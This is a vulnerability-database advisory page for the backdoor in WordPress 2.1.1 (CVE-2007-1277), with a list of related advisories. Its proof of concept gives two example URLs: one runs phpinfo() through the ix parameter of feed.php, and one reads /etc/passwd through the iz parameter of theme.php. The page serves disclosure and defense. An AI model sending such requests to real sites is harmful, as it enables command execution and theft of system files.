Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
wpvulndbWpvulndbWPVDB-ID:5C4CF85B-97E8-4044-839B-B3656C337706
HistoryAug 01, 2014 - 10:58 a.m.

WordPress 2.1.1 - Command Execution Backdoor

2014-08-0110:58:31
wpscan.com
9
JSON

PoC

http://www.example.com/wp-includes/feed.php?ix=phpinfo(); http://www.example.com/wp-includes/theme.php?iz=cat /etc/passwd

CPENameOperatorVersion
wordpresseq2.1.1
wordpresslt2.1.2

Related

nessus 1
prion 1
debiancve 1
cert 2
ubuntucve 1
wpexploit 1
patchstack 1
cve 1
checkpoint_advisories 1
securityvulns 1
nessus
nessus
WordPress < 2.1.1 Multiple Script Backdoors
2007-03-02 00:00:00
prion
prion
Design/Logic Flaw
2007-03-05 20:19:00
debiancve
debiancve
CVE-2007-1277
2007-03-05 20:19:00
cert
cert
WordPress fails to properly sanitize input passed to the iz parameter in wp-includes/theme.php
2007-03-05 00:00:00
WordPress fails to properly sanitize input passed to the ix parameter in wp-includes/feed.php
2007-03-05 00:00:00
ubuntucve
ubuntucve
CVE-2007-1277
2007-03-05 00:00:00
wpexploit
wpexploit
WordPress 2.1.1 - Command Execution Backdoor
2014-08-01 10:58:31
patchstack
patchstack
WordPress <= 2.1.1 - Multiple Vulnerabilities
2007-03-05 00:00:00
cve
cve
CVE-2007-1277
2007-03-05 20:19:00
checkpoint_advisories
checkpoint_advisories
WordPress Backdoor iz Parameter Passthru (CVE-2007-1277)
2014-03-03 00:00:00
securityvulns
securityvulns
Daily web applications security vulnerabilities summary &#40;PHP, ASP, JSP, CGI, Perl&#41;
2007-03-03 00:00:00
JSON
Related for WPVDB-ID:5C4CF85B-97E8-4044-839B-B3656C337706
nessus1prion1debiancve1cert2ubuntucve1wpexploit1patchstack1cve1checkpoint_advisories1securityvulns1